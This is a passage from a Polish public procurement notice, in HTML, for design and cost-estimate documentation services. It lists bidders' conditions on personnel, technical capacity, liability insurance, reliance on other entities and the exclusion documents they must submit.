            3.2.   pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów.
           3.3.   inne dokumenty i oświadczenia, zgodnie z wymogiem pkt. 8.2.
                             SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
  osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi  stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić   Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji   zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie   podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na potrzeby wykonaniu zamówienia, w formie oryginałów. 
              Zamawiający wymaga aby składany dokument-dokumenty dotyczyły w 
              szczególności:
              - zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację       
 wskazującą, który konkretny zasób jest udostępniany. W przypadku  udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku  udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.). W przypadku udostępnienia potencjału technicznego należy wskazać przekazanie do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia   zdolności finansowych-  przeniesienie własności pieniędzy lub pozostawienie do dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej   odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.

   - sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy   
      wykonywaniu zamówienia,

- charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem, 

- zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,

-zobowiązanie innego podmiotu do ponoszenia solidarnej odpowiedzialności wraz z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia zasobów, do udostępnienia których się zobowiązał, chyba, że za nieudostępnienie zasobów nie ponosi winy.

Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9.3 i 9.4. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 i ust. 2 pkt. 5 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.  
2.W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
            2.1.  pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać i konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.)- w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.
            2.2.   pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów.
           2.3.   inne dokumenty i oświadczenia, zgodnie z wymogiem pkt. 8.2.
                             SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
  na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. 
            Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a 
            także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 ww 
            ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b) posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
     Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o 
     spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do 
     wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie 
     spełniania warunków w zakresie wskazanym poniżej:
1.1.Wykonawca musi wykazać, że dysponuje osobami, które będą wykonywać 
                          dokumentację projektowo-kosztorysową, posiadającymi kwalifikacje 
                          zawodowe, doświadczenie i stosowne uprawnienia budowlane do 
                          projektowania bez ograniczeń w specjalności budowlanej, sanitarnej i 
                          elektrycznej właściwej do wykonania przedmiotu zamówienia lub 
                          odpowiadające ww. w przypadku uprawnień wydanych przed dniem 
                         30.12.1994 r. oraz  aktualne zaświadczenia o wpisaniu na listę członków 
                         właściwej Izby Samorządu Zawodowego. 
                          Spełnianie ww. warunku oceniane będzie na podstawie przedłożonego w 
                          ofercie wykazu osób (wg wzoru stanowiącego załącznik nr 5 do
                          formularza oferty ). W ww wykazie należy podać informacje na temat  
                          kwalifikacji zawodowych tych osób, ich uprawnień, doświadczenia i 
                          wykształcenia niezbędnego do wykonania zamówienia,  a także zakresu 
                          wykonywanych przez nich czynności i podstawie do dysponowania nimi. 
                          Wykonawca wybrany do podpisania umowy musi przedłożyć do umowy 
                          uprawnienia osób, które będą wykonywały zamówienie i ich aktualne
                          zaświadczenia o wpisaniu na listę członków właściwej Izby Samorządu 
                          Zawodowego. 
2.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
  osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi  stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić   Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji   zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie   podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na potrzeby wykonaniu zamówienia, w formie oryginałów. 
              Zamawiający wymaga aby składany dokument-dokumenty dotyczyły w 
              szczególności:
              - zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację       
 wskazującą, który konkretny zasób jest udostępniany. W przypadku  udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku  udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.). W przypadku udostępnienia potencjału technicznego należy wskazać przekazanie do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia   zdolności finansowych-  przeniesienie własności pieniędzy lub pozostawienie do dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej   odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.

   - sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy   
      wykonywaniu zamówienia,

- charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem, 

- zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,

-zobowiązanie innego podmiotu do ponoszenia solidarnej odpowiedzialności wraz z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia zasobów, do udostępnienia których się zobowiązał, chyba, że za nieudostępnienie zasobów nie ponosi winy.

Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9.3 i 9.4. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 i ust. 2 pkt. 5 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.  

3.W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
            3.1.  pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać i konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.)- w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.
            3.2.   pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów.
           3.3.   inne dokumenty i oświadczenia, zgodnie z wymogiem pkt. 8.2.
                             SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
  na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. 
            Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a 
            także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 ww 
            ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b) posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
     Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o 
     spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do 
     wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie 
     spełniania warunków w zakresie wskazanym poniżej:
1.1.Wykonawca musi wykazać, że posiada opłaconą polisę, a w przypadku jej          
                         braku inny dokument  potwierdzający, że Wykonawca jest ubezpieczony od 
                         odpowiedzialności  cywilnej w zakresie prowadzonej działalności 
                         związanej z przedmiotem zamówienia potwierdzającą posiadanie ww 
                         ubezpieczenia OC przez Wykonawcę na kwotę co najmniej 30.000 PLN.
                         Zamawiający oceni jako spełniony warunek sytuacji ekonomicznej i 
                         finansowej na podstawie opłaconej polisy, a w przypadku jej braku innego 
                         dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od 
                         odpowiedzialności  cywilnej w zakresie prowadzonej działalności 
                         związanej z przedmiotem zamówienia potwierdzającej posiadanie ww 
                         ubezpieczenia OC przez Wykonawcę na kwotę co najmniej 30.000 PLN.
2.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
  osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi  stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić   Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji   zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie   podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na potrzeby wykonaniu zamówienia, w formie oryginałów. 
              Zamawiający wymaga aby składany dokument-dokumenty dotyczyły w 
              szczególności:
              - zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację       
 wskazującą, który konkretny zasób jest udostępniany. W przypadku  udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku  udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.). W przypadku udostępnienia potencjału technicznego należy wskazać przekazanie do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia   zdolności finansowych-  przeniesienie własności pieniędzy lub pozostawienie do dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej   odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.

   - sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy   
      wykonywaniu zamówienia,

- charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem, 

- zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,

-zobowiązanie innego podmiotu do ponoszenia solidarnej odpowiedzialności wraz z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia zasobów, do udostępnienia których się zobowiązał, chyba, że za nieudostępnienie zasobów nie ponosi winy.

Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9.3 i 9.4. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 i ust. 2 pkt. 5 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.  
3.W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
            3.1.  pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać i konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.)- w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.
            3.2.   pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów.
           3.3.   inne dokumenty i oświadczenia, zgodnie z wymogiem pkt. 8.2.
                             SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Warunki udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków.
1. W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
  na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. 
            Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a 
            także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 ww 
            ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b) posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
     Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o 
     spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do 
     wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie 
     spełniania warunków w zakresie wskazanym poniżej:

1.1. Ad. wiedza i doświadczenie:
             Wykonawca musi wykazać, że posiada wiedzę i doświadczenie w zakresie 
             realizacji usług stanowiących przedmiot zamówienia, tj. musi wykazać, że  
             w okresie ostatnich trzech lat przed upływem terminu składania ofert, a 
             jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 
             wykonał, a w przypadku świadczeń okresowych lub ciągłych również 
             wykonuje, co najmniej 3 usługi polegające na wykonaniu dokumentacji 
             projektowo-kosztorysowej odpowiadającej przedmiotowi zamówienia,  o 
             wartości nie mniejszej niż 12.000,00 zł brutto każda. 
                           Spełnienie ww  warunku Zamawiający oceniał będzie na podstawie 
                           załączonego do oferty wykazu wykonanych głównych usług, określonych 
                           w pkt 9.2.2 SIWZ, sporządzonego wg wzoru stanowiącego załącznik nr 4 
                           do formularza oferty i załączonych dowodów, określonych w pkt. 9.2.6. 
                           SIWZ  potwierdzających, że wymienione w nim usługi zostały wykonane w 
                           sposób należyty lub są wykonywane należycie.
             
1.2.  Ad. dysponowania osobami zdolnymi do wykonania zamówienia:
                          Wykonawca musi wykazać, że dysponuje osobami, które będą wykonywać 
                          dokumentację projektowo-kosztorysową, posiadającymi kwalifikacje 
                          zawodowe, doświadczenie i stosowne uprawnienia budowlane do 
                          projektowania bez ograniczeń w specjalności budowlanej, sanitarnej i 
                          elektrycznej właściwej do wykonania przedmiotu zamówienia lub 
                          odpowiadające ww. w przypadku uprawnień wydanych przed dniem 
                         30.12.1994 r. oraz  aktualne zaświadczenia o wpisaniu na listę członków 
                         właściwej Izby Samorządu Zawodowego. 
                          Spełnianie ww. warunku oceniane będzie na podstawie przedłożonego w 
                          ofercie wykazu osób (wg wzoru stanowiącego załącznik nr 5 do
                          formularza oferty ). W ww wykazie należy podać informacje na temat  
                          kwalifikacji zawodowych tych osób, ich uprawnień, doświadczenia i 
                          wykształcenia niezbędnego do wykonania zamówienia,  a także zakresu 
                          wykonywanych przez nich czynności i podstawie do dysponowania nimi. 
                          Wykonawca wybrany do podpisania umowy musi przedłożyć do umowy 
                          uprawnienia osób, które będą wykonywały zamówienie i ich aktualne
                          zaświadczenia o wpisaniu na listę członków właściwej Izby Samorządu 
                          Zawodowego. 
 
             1.3. Ad.  sytuacji ekonomicznej i finansowej:
                         Wykonawca musi wykazać, że posiada opłaconą polisę, a w przypadku jej          
                         braku inny dokument  potwierdzający, że Wykonawca jest ubezpieczony od 
                         odpowiedzialności  cywilnej w zakresie prowadzonej działalności 
                         związanej z przedmiotem zamówienia potwierdzającą posiadanie ww 
                         ubezpieczenia OC przez Wykonawcę na kwotę co najmniej 30.000 PLN.
                         Zamawiający oceni jako spełniony warunek sytuacji ekonomicznej i 
                         finansowej na podstawie opłaconej polisy, a w przypadku jej braku innego 
                         dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od 
                         odpowiedzialności  cywilnej w zakresie prowadzonej działalności 
                         związanej z przedmiotem zamówienia potwierdzającej posiadanie ww 
                         ubezpieczenia OC przez Wykonawcę na kwotę co najmniej 30.000 PLN.

  1.4. Ocena spełnienia warunku nie podlegania wykluczeniu na podstawie art. 24 ust. 1 ww ustawy Pzp z postępowania  zostanie dokonana na podstawie oświadczenia Wykonawcy o braku podstaw do wykluczenia stanowiącego załącznik nr 7 do wzoru formularza oferty oraz na podstawie dokumentów przedłożonych przez Wykonawcę, o których mowa w pkt. 9.3., 9.4. siwz i-lub 9.7. SIWZ.

1.5. Ocena spełnienia warunku nie podlegania wykluczeniu na podstawie art.   
            24 ust. 2 pkt. 5 ww ustawy Pzp z postępowania  zostanie dokonana na 
            podstawie złożenia przez Wykonawcę listy podmiotów należących do tej 
            samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy pzp 
            lub informacji o braku przynależności do grupy kapitałowej - wzór druku 
            stanowi załącznik nr 8 do SIWZ.

      2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
  osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi  stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić   Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji   zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie   podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na potrzeby wykonaniu zamówienia, w formie oryginałów. 
              Zamawiający wymaga aby składany dokument-dokumenty dotyczyły w 
              szczególności:
              - zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację       
 wskazującą, który konkretny zasób jest udostępniany. W przypadku  udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku  udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.). W przypadku udostępnienia potencjału technicznego należy wskazać przekazanie do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia   zdolności finansowych-  przeniesienie własności pieniędzy lub pozostawienie do dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej   odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.

   - sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy   
      wykonywaniu zamówienia,

- charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem, 

- zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,

-zobowiązanie innego podmiotu do ponoszenia solidarnej odpowiedzialności wraz z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia zasobów, do udostępnienia których się zobowiązał, chyba, że za nieudostępnienie zasobów nie ponosi winy.

Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9.3 i 9.4. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 i ust. 2 pkt. 5 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.  

   2.1. 	Zamawiający oceni jako spełniony warunek nie podlegania wykluczeniu z  
             postępowania na podstawie oświadczenia Wykonawcy o braku podstaw do 
             wykluczenia stanowiącego załącznik nr 7 i 8 do wzoru formularza oferty oraz na 
             podstawie dokumentów przedłożonych przez Wykonawcę, o których mowa w 
             pkt. 9.3. i 9.4. specyfikacji istotnych warunków zamówienia.

   2.2. 	Wypełnienie przez Wykonawcę formularza oferty oraz spełnienie innych     
             wymagań określonych w specyfikacji istotnych warunków zamówienia będzie  
             stanowiło podstawę oceny ofert. Zamawiający żąda, żeby Wykonawca wykazał, 
             nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w 
             pkt. 8.  siwz.

2.3. 	Zamawiający wykluczy z postępowania Wykonawcę, w stosunku do którego stwierdzono podstawę wykluczenia z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 24 ust. 1 i art. 24 ust. 2 pkt. 5 ustawy Prawo Zamówień Publicznych oraz tego, który nie spełnia wymaganych warunków oraz jeśli stwierdzi, że dostarczone przez niego informacje mające wpływ lub mogące mieć wpływ na wynik prowadzonego postępowania są nieprawdziwe.

3. Oferta oraz dokumenty i oświadczenia, wymagane w postępowaniu .
    3.1. Wykonawca musi dołączyć do oferty w terminie wskazanym w pkt. 17. 
             specyfikacji istotnych warunków zamówienia i w formie określonej w  
             specyfikacji:
3.1.1. 	wypełniony i podpisany formularz oferty zgodny w treści ze wzorem stanowiącym Rozdział II specyfikacji istotnych warunków zamówienia, 
3.1.2. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 9.6.1.2. niniejszej specyfikacji, jeżeli oferty będą składali Wykonawcy wspólnie ubiegający się o udzielenie zamówienia,  
3.1.3. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 14.6.3. niniejszej specyfikacji, jeśli oferta będzie podpisana przez pełnomocnika,
3.1.4. 	informację o części - częściach zamówienia, które Wykonawca zamierza powierzyć podwykonawcom, o ile Wykonawca będzie realizował zamówienie z udziałem podwykonawców,  
3.1.5.  informację podmiotów i o podmiotach, które będą brały udział w realizacji  części zamówienia, na zasobach, których polega wykonawca na zasadach określonych w pkt. 8.2. siwz, 
             3.1.6. 	oświadczenie o zapoznaniu się i akceptacji założeń projektowych i 
